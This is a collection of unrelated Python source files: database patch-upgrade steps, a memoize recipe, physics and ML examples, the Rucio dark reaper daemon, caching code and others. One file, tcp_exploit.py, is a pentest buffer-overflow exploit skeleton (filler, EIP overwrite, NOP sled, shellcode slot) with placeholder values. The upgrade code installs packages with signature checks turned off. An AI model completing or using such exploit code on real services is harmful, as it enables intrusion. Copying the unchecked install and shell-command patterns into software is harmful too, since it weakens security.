if self.source_patch.patch_version > self.target_patch.patch_version:
error = "Target patch must be bigger than source patch."
            error += " Source patch={}, target patch={}".format(
self.source_patch, self.target_patch)
raise CantUpgradePatch(error)
if not self.patch_path_by_os:
error = "Patch path can not be empty."
raise CantUpgradePatch(error)
return True
def execute_script(self, script):
        raise Exception(
            "You must use the new method `run_script` of the HostSSH class"
        )
output = {}
return_code = exec_remote_command_host(self.host, script, output)
if return_code != 0:
error = 'Could not execute script {}: {}'.format(
return_code, output)
raise EnvironmentError(error)
def undo(self):
pass
class MongoDBCHGBinStep(DatabaseUpgradePatchStep):
def do(self):
if not self.is_valid:
return
patch_path = self.patch_path_by_os
dir_name = os.path.splitext(os.path.basename(patch_path))[0]
if self.patch_path_by_os.startswith('https'):
download_script = 'curl {} | tar -xz'.format(patch_path)
else:
download_script = 'tar -xvf {}'.format(patch_path)
script = """cd /usr/local/
{download_script}
rm -f mongodb
ln -s {dir_name} mongodb
chown -R mongodb:mongodb mongodb/
""".format(download_script=download_script, dir_name=dir_name)
# self.execute_script(script)
self.host.ssh.run_script(script)
class MongoDBCHGBinStepRollback(MongoDBCHGBinStep):
def do(self):
pass
def undo(self):
super(MongoDBCHGBinStepRollback, self).do()
class RedisCHGBinStep(DatabaseUpgradePatchStep):
def do(self):
if not self.is_valid:
return
patch_path = self.patch_path_by_os
_, file_name = os.path.split(patch_path)
dir_name = file_name.rsplit('.', 2)[0]
if self.patch_path_by_os.startswith('https'):
download_script = 'curl {} | tar -xz'.format(patch_path)
else:
download_script = 'tar -xvf {}'.format(patch_path)
script = """cd /usr/local/
{download_script}
rm -f redis
ln -s {dir_name} redis
cd redis && make
wget -P /usr/local/redis/src/ https://artifactory.globoi.com/artifactory/generic-local/db/redis/redis-trib-gcom.rb
cd ..
chown -R redis:redis redis/
""".format(download_script=download_script, dir_name=dir_name)
# self.execute_script(script)
self.host.ssh.run_script(script)
class RedisCHGBinStepRollback(RedisCHGBinStep):
def do(self):
pass
def undo(self):
super(RedisCHGBinStepRollback, self).do()
class MySQLCHGBinStep(DatabaseUpgradePatchStep):
def do(self):
if not self.is_valid:
return
patch_path = self.patch_path_by_os
if self.patch_path_by_os.startswith('https'):
script = """
mkdir /tmp/mysql_patch/
wget -P /tmp/mysql_patch/ -r -nH --reject="index.html*" --no-parent --cut-dirs=8 {patch_path}
yum -y localinstall --nogpgcheck /tmp/mysql_patch/*.rpm
rm -rf /tmp/mysql_patch/
""".format(patch_path=patch_path)
else:
script = """cd {patch_path}
yum -y localinstall --nogpgcheck *.rpm
""".format(patch_path=patch_path)
# self.execute_script(script)
self.host.ssh.run_script(script)
class MySQLCHGBinStepRollback(MySQLCHGBinStep):
def do(self):
pass
def undo(self):
super(MySQLCHGBinStepRollback, self).do()
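# --- Editor's note: hedged usage sketch, not part of the DBaaS workflow code.
# The steps above are normally driven by the workflow engine; assuming
# `instance` is the database instance object expected by BaseInstanceStep,
# a single step would be exercised roughly like this:
#
#   step = MySQLCHGBinStep(instance)
#   step.do()   # no-op unless is_valid; otherwise runs the patch script over SSH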
|
recipes/Python/498110_Memoize_decorator_O1_lengthlimited_LRU_cache/recipe-498110.py
|
tdiprima/code
| 2,023 |
70528
|
import cPickle
__all__ = ['memoize']
# This would usually be defined elsewhere
class decoratorargs(object):
def __new__(typ, *attr_args, **attr_kwargs):
def decorator(orig_func):
self = object.__new__(typ)
self.__init__(orig_func, *attr_args, **attr_kwargs)
return self
return decorator
class memoize(decoratorargs):
class Node:
__slots__ = ['key', 'value', 'older', 'newer']
def __init__(self, key, value, older=None, newer=None):
self.key = key
self.value = value
self.older = older
self.newer = newer
def __init__(self, func, capacity, keyfunc=lambda *args, **kwargs: cPickle.dumps((args, kwargs))):
self.func = func
self.capacity = capacity
self.keyfunc = keyfunc
self.reset()
def reset(self):
self.mru = self.Node(None, None)
self.mru.older = self.mru.newer = self.mru
self.nodes = {self.mru.key: self.mru}
self.count = 1
self.hits = 0
self.misses = 0
def __call__(self, *args, **kwargs):
key = self.keyfunc(*args, **kwargs)
try:
node = self.nodes[key]
except KeyError:
# We have an entry not in the cache
self.misses += 1
value = self.func(*args, **kwargs)
lru = self.mru.newer # Always true
# If we haven't reached capacity
if self.count < self.capacity:
# Put it between the MRU and LRU - it'll be the new MRU
node = self.Node(key, value, self.mru, lru)
self.mru.newer = node
lru.older = node
self.mru = node
self.count += 1
else:
# It's FULL! We'll make the LRU be the new MRU, but replace its
# value first
del self.nodes[lru.key] # This mapping is now invalid
lru.key = key
lru.value = value
self.mru = lru
# Add the new mapping
self.nodes[key] = self.mru
return value
# We have an entry in the cache
self.hits += 1
# If it's already the MRU, do nothing
if node is self.mru:
return node.value
lru = self.mru.newer # Always true
# If it's the LRU, update the MRU to be it
if node is lru:
self.mru = lru
return node.value
# Remove the node from the list
node.older.newer = node.newer
node.newer.older = node.older
# Put it between MRU and LRU
node.older = self.mru
self.mru.newer = node
node.newer = lru
lru.older = node
self.mru = node
return node.value
# Example usage - fib only needs a cache size of 3 to keep it from
# being an exponential-time algorithm
@memoize(3)
def fib(n): return (n > 1) and (fib(n - 1) + fib(n - 2)) or 1
fib(100) # => 573147844013817084101L
# This is faster because it doesn't use the default key function -
# it doesn't need to call cPickle.dumps((args, kwargs))
@memoize(100, lambda n: n)
def fib(n): return (n > 1) and (fib(n - 1) + fib(n - 2)) or 1
fib(100) # => 573147844013817084101L
# See what's in the cache
# => [(98, 218922995834555169026L), (99, 354224848179261915075L), (100, 573147844013817084101L)]
[(node.key, node.value) for node in fib.nodes.values()]
# Get an example of the key function working
fib.keyfunc(40) # => 40
# Simple report on performance
# => Hit %: 0.492462
print 'Hit %%: %f' % (float(fib.hits) / (fib.hits + fib.misses))
# Resize the LRU cache
fib.capacity = 100
fib.reset() # Not necessary unless you shrink it
|
Examples/Legacy/Ising1d/ising1d.py
|
gpescia/MyNetKet
| 352 |
70539
|
# Copyright 2020 The Netket Authors. - All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from netket import legacy as nk
# 1D Lattice
L = 20
g = nk.graph.Hypercube(length=L, n_dim=1, pbc=True)
# Hilbert space of spins on the graph
hi = nk.hilbert.Spin(s=1 / 2, N=g.n_nodes)
# Ising spin hamiltonian
ha = nk.operator.Ising(hilbert=hi, graph=g, h=1.0)
# RBM Spin Machine
ma = nk.nn.models.RBM(alpha=1)
# Metropolis Local Sampling
sa = nk.sampler.MetropolisLocal(hi, n_chains=32)
# Optimizer
op = nk.optim.GradientDescent(learning_rate=0.1)
# Create the optimization driver
vs = nk.variational_states.ClassicalVariationalState(
ma, sa, n_samples=1000, n_discard=100
)
gs = nk.Vmc(ha, op, variational_state=vs)
# Run the optimization for 300 iterations
gs.run(n_iter=2, out=None)
gs.run(n_iter=300, out=None)
|
tcp_exploit.py
|
sandlib/pythonpentest
| 174 |
70559
|
#!/usr/bin/env python
'''
Author: <NAME>
Date: May 2015
Name: tcp_exploit.py
Purpose: A sample exploit for testing TCP services
Copyright (c) 2015, <NAME> All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys, socket, struct
rhost = ""
lhost = ""
rport =
fill ="A"*####
eip = struct.pack('<I',0x########)
offset = "\x90"*##
available_shellcode_space = ###
shell =() #Code to insert
# NOPs to fill the remaining space
exploit = fill + eip + offset + shell
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.sendto(exploit, (rhost, rport))
|
socfaker/__init__.py
|
priamai/soc-faker
| 122 |
70560
|
<reponame>priamai/soc-faker<gh_stars>100-1000
from .socfaker import SocFaker
|
scripts/execute_notebook.py
|
kyteinsky/OmniNet
| 525 |
70572
|
<reponame>kyteinsky/OmniNet
#!/usr/bin/env python
import glob
import os
if __name__ == '__main__':
print('Searching for notebooks in the notebooks directory')
# maybe executing like execute_notebook.py
notebook_dir = '../notebooks'
result_dir = '../results'
if not os.path.exists(notebook_dir):
# maybe executing like scripts/execute_notebook.py
notebook_dir = './notebooks'
result_dir = './results'
if not os.path.exists(notebook_dir):
# still did not find the notebook directory
print('Notebook Directory not found! Exiting')
exit(0)
# glob notebooks
notebooks = glob.glob(f'{notebook_dir}/*.ipynb')
# the length cannot be 0
if len(notebooks) == 0:
print('No Notebooks found! Exiting.')
exit(0)
print('Select a notebook to run. Results will be logged to <notebook_name>.log in the results directory\n')
for i in range(len(notebooks)):
print(f'{i + 1}. {os.path.basename(notebooks[i])}')
try:
option = int(input('\nEnter option: '))
        if option > len(notebooks):
            raise IndexError
print(f'Executing notebook {os.path.basename(notebooks[option - 1])}')
# deal with spaces in file names
selected_notebook = notebooks[option - 1].replace(' ', '\ ')
result_file_name = os.path.splitext(os.path.basename(selected_notebook))[0]
# run the selected notebook
os.system(f'jupyter nbconvert --to script --execute --stdout {selected_notebook} | '
f'python -u 2>&1 | tee {result_dir}/{result_file_name}.log &')
print('Process started!')
except IndexError as e:
        print('Invalid option! Exiting.')
exit(0)
|
code/vectormomentum/Code/Python/Libraries/__init__.py
|
ninamiolane/quicksilver
| 126 |
70582
|
<reponame>ninamiolane/quicksilver
#from CAvmHGMCommon import *
#from CAvmCommon import *
|
supervised/utils/learning_curves.py
|
stjordanis/mljar-supervised
| 1,882 |
70583
|
import os
import logging
import numpy as np
import pandas as pd
logger = logging.getLogger(__name__)
from supervised.utils.config import LOG_LEVEL
from supervised.utils.common import learner_name_to_fold_repeat
from supervised.utils.metric import Metric
logger.setLevel(LOG_LEVEL)
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
MY_COLORS = list(mcolors.TABLEAU_COLORS.values())
class LearningCurves:
output_file_name = "learning_curves.png"
@staticmethod
def single_iteration(learner_names, model_path):
for ln in learner_names:
df = pd.read_csv(
os.path.join(model_path, f"{ln}_training.log"),
names=["iteration", "train", "test"],
)
if df.shape[0] > 1:
return False
return True
@staticmethod
def plot(learner_names, metric_name, model_path, trees_in_iteration=None):
colors = MY_COLORS
if len(learner_names) > len(colors):
repeat_colors = int(np.ceil(len(learner_names) / len(colors)))
colors = colors * repeat_colors
if LearningCurves.single_iteration(learner_names, model_path):
LearningCurves.plot_single_iter(
learner_names, metric_name, model_path, colors
)
else:
LearningCurves.plot_iterations(
learner_names, metric_name, model_path, colors, trees_in_iteration
)
@staticmethod
def plot_single_iter(learner_names, metric_name, model_path, colors):
plt.figure(figsize=(10, 7))
for ln in learner_names:
df = pd.read_csv(
os.path.join(model_path, f"{ln}_training.log"),
names=["iteration", "train", "test"],
)
fold, repeat = learner_name_to_fold_repeat(ln)
            repeat_str = f" Repeat {repeat+1}," if repeat is not None else ""
plt.bar(
f"Fold {fold+1},{repeat_str} train",
df.train[0],
color="white",
edgecolor=colors[fold],
)
plt.bar(f"Fold {fold+1},{repeat_str} test", df.test[0], color=colors[fold])
plt.ylabel(metric_name)
plt.xticks(rotation=90)
plt.tight_layout(pad=2.0)
plot_path = os.path.join(model_path, LearningCurves.output_file_name)
plt.savefig(plot_path)
plt.close("all")
@staticmethod
def plot_iterations(
learner_names, metric_name, model_path, colors, trees_in_iteration=None
):
plt.figure(figsize=(10, 7))
for ln in learner_names:
df = pd.read_csv(
os.path.join(model_path, f"{ln}_training.log"),
names=["iteration", "train", "test"],
)
fold, repeat = learner_name_to_fold_repeat(ln)
            repeat_str = f" Repeat {repeat+1}," if repeat is not None else ""
# if trees_in_iteration is not None:
# df.iteration = df.iteration * trees_in_iteration
any_none = np.sum(pd.isnull(df.train))
if any_none == 0:
plt.plot(
df.iteration,
df.train,
"--",
color=colors[fold],
label=f"Fold {fold+1},{repeat_str} train",
)
any_none = np.sum(pd.isnull(df.test))
if any_none == 0:
plt.plot(
df.iteration,
df.test,
color=colors[fold],
label=f"Fold {fold+1},{repeat_str} test",
)
best_iter = None
if Metric.optimize_negative(metric_name):
best_iter = df.test.argmax()
else:
best_iter = df.test.argmin()
if best_iter is not None and best_iter != -1:
plt.axvline(best_iter, color=colors[fold], alpha=0.3)
if trees_in_iteration is not None:
plt.xlabel("#Trees")
else:
plt.xlabel("#Iteration")
plt.ylabel(metric_name)
# limit number of learners in the legend
# too many will raise warnings
if len(learner_names) <= 15:
plt.legend(loc="best")
plt.tight_layout(pad=2.0)
plot_path = os.path.join(model_path, LearningCurves.output_file_name)
plt.savefig(plot_path)
plt.close("all")
@staticmethod
def plot_for_ensemble(scores, metric_name, model_path):
plt.figure(figsize=(10, 7))
        plt.plot(range(1, len(scores) + 1), scores, label="Ensemble")
plt.xlabel("#Iteration")
plt.ylabel(metric_name)
plt.legend(loc="best")
plot_path = os.path.join(model_path, LearningCurves.output_file_name)
plt.savefig(plot_path)
plt.close("all")
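# --- Editor's note: hedged usage sketch, not part of mljar-supervised. The
# plots above expect `<learner>_training.log` CSV files (iteration, train,
# test) inside `model_path`; the learner names and path below are hypothetical.
#
#   LearningCurves.plot(
#       learner_names=["learner_fold_0", "learner_fold_1"],
#       metric_name="logloss",
#       model_path="AutoML_1/1_DecisionTree",
#   )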
|
lib/rucio/daemons/reaper/dark_reaper.py
|
jamesp-epcc/rucio
| 187 |
70607
|
# -*- coding: utf-8 -*-
# Copyright 2016-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - <NAME> <<EMAIL>>, 2016-2018
# - <NAME> <<EMAIL>>, 2016-2021
# - <NAME> <<EMAIL>>, 2016-2021
# - <NAME> <<EMAIL>>, 2018-2019
# - <NAME> <<EMAIL>>, 2019
# - <NAME> <<EMAIL>>, 2020
# - <NAME> <<EMAIL>>, 2019
# - <NAME> <<EMAIL>>, 2020
# - <NAME> <<EMAIL>>, 2020
# - <NAME> <<EMAIL>>, 2020-2021
# - <NAME> <<EMAIL>>, 2021
# - <NAME> <<EMAIL>>, 2021
'''
Dark Reaper is a daemon to manage quarantined file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.config import config_get_bool
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, ResourceTemporaryUnavailable,
RSENotFound, VONotFound)
from rucio.common.logging import setup_logging
from rucio.common.utils import daemon_sleep
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.quarantined_replica import (list_quarantined_replicas,
delete_quarantined_replicas,
list_rses)
import rucio.core.rse as rse_core
from rucio.core.rse_expression_parser import parse_expression
from rucio.core.vo import list_vos
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
GRACEFUL_STOP = threading.Event()
def reaper(rses, worker_number=0, total_workers=1, chunk_size=100, once=False, scheme=None, sleep_time=60):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
:param sleep_time: Thread sleep time after each chunk of work.
"""
logging.info('Starting Dark Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, ', '.join(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
hash_executable = hashlib.sha256((sys.argv[0] + ''.join(rses)).encode()).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread,
hash_executable=hash_executable)
logging.info('Dark Reaper({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'
.format(locals()))
nothing_to_do = True
start_time = time.time()
rses_to_process = list(set(rses) & set(list_rses()))
random.shuffle(rses_to_process)
for rse_id in rses_to_process:
replicas = list_quarantined_replicas(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse_info = rsemgr.get_rse_info(rse_id=rse_id)
rse = rse_info['rse']
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
scope = ''
if replica['scope']:
scope = replica['scope'].external
try:
pfn = str(list(rsemgr.lfns2pfns(rse_settings=rse_info,
lfns=[{'scope': scope,
'name': replica['name'],
'path': replica['path']}],
operation='delete',
scheme=scheme).values())[0])
logging.info('Dark Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s',
worker_number, total_workers, scope, replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logging.info('Dark Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds',
worker_number, total_workers, scope, replica['name'], pfn, rse, duration)
payload = {'scope': scope,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']}
if replica['scope'].vo != 'def':
payload['vo'] = replica['scope'].vo
add_message('deletion-done', payload)
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = ('Dark Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s'
% (worker_number, total_workers, scope, replica['name'], pfn, rse))
logging.warning(err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = ('Dark Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s'
% (worker_number, total_workers, scope, replica['name'], pfn, rse, str(error)))
logging.warning(err_msg)
payload = {'scope': scope,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']}
if replica['scope'].vo != 'def':
payload['vo'] = replica['scope'].vo
add_message('deletion-failed', payload)
except Exception:
logging.critical(traceback.format_exc())
finally:
prot.close()
delete_quarantined_replicas(rse_id=rse_id, replicas=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logging.info('Dark Reaper %s-%s: Nothing to do', worker_number, total_workers)
daemon_sleep(start_time=start_time, sleep_time=sleep_time, graceful_stop=GRACEFUL_STOP)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except Exception:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, vos=None, delay_seconds=0, sleep_time=60):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs (Single-VO only).
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
:param vos: VOs on which to look for RSEs. Only used in multi-VO mode.
If None, we either use all VOs if run from "def", or the current VO otherwise.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
logging.info('main: starting processes')
multi_vo = config_get_bool('common', 'multi_vo', raise_exception=False, default=False)
if not multi_vo:
if vos:
logging.warning('Ignoring argument vos, this is only applicable in a multi-VO setup.')
vos = ['def']
else:
if vos:
invalid = set(vos) - set([v['vo'] for v in list_vos()])
if invalid:
msg = 'VO{} {} cannot be found'.format('s' if len(invalid) > 1 else '',
', '.join([repr(v) for v in invalid]))
raise VONotFound(msg)
else:
vos = [v['vo'] for v in list_vos()]
logging.info('Dark Reaper: This instance will work on VO%s: %s'
% ('s' if len(vos) > 1 else '', ', '.join([v for v in vos])))
all_rses = []
for vo in vos:
all_rses.extend([rse['id'] for rse in rse_core.list_rses(filters={'vo': vo})])
if rses:
invalid = set(rses) - set([rse['rse'] for rse in all_rses])
if invalid:
msg = 'RSE{} {} cannot be found'.format('s' if len(invalid) > 1 else '',
', '.join([repr(rse) for rse in invalid]))
raise RSENotFound(msg)
rses = [rse for rse in all_rses if rse['rse'] in rses]
else:
rses = all_rses
if exclude_rses:
excluded_rses = [rse['id'] for rse in parse_expression(exclude_rses)]
rses = [rse for rse in rses if rse not in excluded_rses]
if include_rses:
included_rses = [rse['id'] for rse in parse_expression(include_rses)]
rses = [rse for rse in rses if rse in included_rses]
if not rses:
logging.error('Dark Reaper: No RSEs found. Exiting.')
return
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme,
'sleep_time': sleep_time}
threads.append(threading.Thread(target=reaper, kwargs=kwargs,
name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
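# --- Editor's note: hedged usage sketch, not part of Rucio. In production the
# daemon is started from the Rucio CLI tooling; assuming a configured Rucio
# database, a single-shot pass over all RSEs could be launched roughly like:
#
#   if __name__ == '__main__':
#       run(total_workers=1, chunk_size=50, once=True)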
|
web/index/migrations/0003_auto_20200407_1756.py
|
laozhudetui/LSpider
| 311 |
70615
|
<reponame>laozhudetui/LSpider<gh_stars>100-1000
# Generated by Django 3.0.1 on 2020-04-07 09:56
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('index', '0002_scantask_last_scan_time'),
]
operations = [
migrations.AlterField(
model_name='scantask',
name='last_scan_time',
field=models.DateTimeField(default=datetime.datetime(2020, 4, 7, 9, 56, 27, 101552, tzinfo=utc)),
),
]
|
backend/post/cache.py
|
restato/bunnybook
| 131 |
70622
|
import datetime as dt
import json
from typing import List, Optional
from uuid import UUID
from fastapi.encoders import jsonable_encoder
from injector import singleton, inject
from common.cache import fail_silently, hash_cache_key
from common.injection import Cache
from database.utils import map_to
from post.models import Post
@singleton
class PostCache:
POSTS_EX: int = int(dt.timedelta(minutes=1).total_seconds())
@inject
def __init__(self, cache: Cache):
self._cache = cache
@fail_silently()
async def get_posts(
self,
wall_profile_id: UUID,
include_friends: bool,
older_than: dt.datetime) -> Optional[List[Post]]:
cached_posts_ids = await self._cache.get(
f"walls:{wall_profile_id}:posts:"
f"{hash_cache_key(wall_profile_id, include_friends, older_than)}")
cached_posts_ids = cached_posts_ids and json.loads(cached_posts_ids)
if not cached_posts_ids:
return None
cached_posts = await self._cache.mget(
*[f"posts:{post_id}" for post_id in cached_posts_ids])
return (all(cached_posts) or None) and [map_to(json.loads(post), Post)
for post in cached_posts]
@fail_silently()
async def get_post(self, post_id: UUID) -> Optional[Post]:
cached_post = await self._cache.get(f"posts:{post_id}")
return cached_post and map_to(json.loads(cached_post), Post)
@fail_silently()
async def set_post(self, post: Post) -> None:
await self._cache.set(f"posts:{post.id}",
json.dumps(jsonable_encoder(post)),
expire=PostCache.POSTS_EX)
@fail_silently()
async def set_posts(
self,
posts: List[Post],
wall_profile_id: UUID,
include_friends: bool,
older_than: Optional[dt.date]) -> None:
params_cache_key = hash_cache_key(
wall_profile_id, include_friends, older_than)
posts_ids_key = f"walls:{wall_profile_id}:posts:{params_cache_key}"
pipe = self._cache.pipeline()
pipe.mset(posts_ids_key, json.dumps([str(post.id) for post in posts]),
*list(sum([(f"posts:{post.id}",
json.dumps(jsonable_encoder(post)))
for post in posts], ())))
for key in [posts_ids_key, *[f"posts:{post.id}" for post in posts]]:
pipe.expire(key, PostCache.POSTS_EX)
await pipe.execute()
@fail_silently()
async def unset_posts_ids(
self,
wall_profile_id: UUID,
include_friends: bool,
older_than: Optional[dt.date]) -> None:
await self._cache.delete(
f"walls:{wall_profile_id}:posts:"
f"{hash_cache_key(wall_profile_id, include_friends, older_than)}")
@fail_silently()
async def unset_post(self, post_id: UUID) -> None:
await self._cache.delete(f"posts:{post_id}")
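# --- Editor's note: hedged usage sketch, not part of bunnybook. A typical
# read-through pattern, assuming an injector-provided PostCache and a
# hypothetical `fetch_posts_from_db` coroutine:
#
#   async def get_wall_posts(cache: PostCache, wall_id, older_than):
#       posts = await cache.get_posts(wall_id, include_friends=True,
#                                     older_than=older_than)
#       if posts is None:
#           posts = await fetch_posts_from_db(wall_id, older_than)
#           await cache.set_posts(posts, wall_id, True, older_than)
#       return posts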
|
Ch3/mnist.py
|
jason-168/MLCode
| 146 |
70639
|
# Code from Chapter 3 of Machine Learning: An Algorithmic Perspective (2nd Edition)
# by <NAME> (http://stephenmonika.net)
# You are free to use, change, or redistribute the code in any way you wish for
# non-commercial purposes, but please maintain the name of the original author.
# This code comes with no warranty of any kind.
# <NAME>, 2008, 2014
import pylab as pl
import numpy as np
import pcn
import cPickle, gzip
# Read the dataset in (code from sheet)
f = gzip.open('mnist.pkl.gz','rb')
tset, vset, teset = cPickle.load(f)
f.close()
nread = 200
# Just use the first few images
train_in = tset[0][:nread,:]
# This is a little bit of work -- 1 of N encoding
# Make sure you understand how it does it
train_tgt = np.zeros((nread,10))
for i in range(nread):
train_tgt[i,tset[1][i]] = 1
test_in = teset[0][:nread,:]
test_tgt = np.zeros((nread,10))
for i in range(nread):
test_tgt[i,teset[1][i]] = 1
# Train a Perceptron on training set
p = pcn.pcn(train_in, train_tgt)
p.pcntrain(train_in, train_tgt,0.25,100)
# This isn't really good practice since it's on the training data,
# but it does show that it is learning.
p.confmat(train_in,train_tgt)
# Now test it
p.confmat(test_in,test_tgt)
|
graph_explorer/test/test_structured_metrics.py
|
farheenkaifee/dashboard_3
| 284 |
70648
|
<reponame>farheenkaifee/dashboard_3
from graph_explorer import structured_metrics
def test_load():
s_metrics = structured_metrics.StructuredMetrics()
errors = s_metrics.load_plugins()
assert len(errors) == 0
|
mols2grid/molgrid.py
|
cbouy/mol2grid
| 105 |
70662
|
from typing import Type
import warnings
from base64 import b64encode
from html import escape
import json
import pandas as pd
import numpy as np
from rdkit import Chem
from rdkit.Chem import Draw
from .utils import (env,
requires,
tooltip_formatter,
mol_to_record,
mol_to_smiles,
sdf_to_dataframe,
remove_coordinates)
from .select import register
try:
from IPython.display import HTML, Javascript
except ModuleNotFoundError:
pass
else:
warnings.filterwarnings("ignore",
"Consider using IPython.display.IFrame instead")
class MolGrid:
"""Class that handles drawing molecules, rendering the HTML document and
saving or displaying it in a notebook
"""
def __init__(self, df, smiles_col="SMILES", mol_col=None, removeHs=False,
use_coords=True, coordGen=True, useSVG=True, size=(160, 120),
MolDrawOptions=None, rename=None, name="default", **kwargs):
"""
Parameters
----------
df : pandas.DataFrame or dict or list
Dataframe containing a SMILES or mol column, or dictionary
            containing a list of SMILES, or list of dictionaries containing a
SMILES field
smiles_col : str or None
Name of the SMILES column in the dataframe, if available
mol_col : str or None
Name of an RDKit molecule column. If available, coordinates and
atom/bonds annotations from this will be used for depiction
removeHs : bool
Remove hydrogen atoms from the drawings
use_coords : bool
Use the existing coordinates of the molecule
coordGen : bool
Sets whether or not the CoordGen library should be preferred to the
RDKit depiction library
useSVG : bool
Use SVG instead of PNG
size : tuple
The size of the drawing canvas
MolDrawOptions : rdkit.Chem.Draw.MolDrawOptions or None
Drawing options. Useful for making highly customized drawings
rename : dict or None
Rename the properties/fields stored in the molecule
name : str
Name of the grid. Used when retrieving selections from multiple
grids at the same time
kwargs : object
MolDrawOptions attributes
Notes
-----
The list of supported MolDrawOptions attributes are available in
https://www.rdkit.org/docs/source/rdkit.Chem.Draw.rdMolDraw2D.html#rdkit.Chem.Draw.rdMolDraw2D.MolDrawOptions
        .. versionchanged:: 0.1.0
Added `rename` argument to replace `mapping`
"""
if not (smiles_col or mol_col):
raise ValueError("One of `smiles_col` or `mol_col` must be set")
